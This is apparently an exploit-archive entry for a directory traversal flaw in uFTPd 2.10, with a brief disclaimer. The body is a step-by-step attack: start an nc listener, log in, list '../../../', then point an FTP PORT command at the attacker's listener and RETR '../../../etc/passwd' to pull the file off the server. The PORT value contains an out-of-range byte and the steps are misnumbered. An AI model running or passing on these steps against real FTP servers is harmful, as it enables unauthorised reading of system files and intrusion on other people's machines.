Exploits / Vulnerability Discovered : 2022-08-02 |
Type : remote |
Platform : linux
This exploit / vulnerability Uftpd 2.10 directory traversal (authenticated) is for educational purposes only and if it is used you will do on your own risk!
#Proof-Of-Concept:
1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication.
#Steps
1-Setup nc listener on attacking machine on TCP port 1258
nc -lnvp 1258
2-Login to the FTP service
3-List files
ftp> ls ../../../
3-Set attacker's IP address and retrieve files
PORT 127,0,0,1,1,1002
RETR ../../../etc/passwd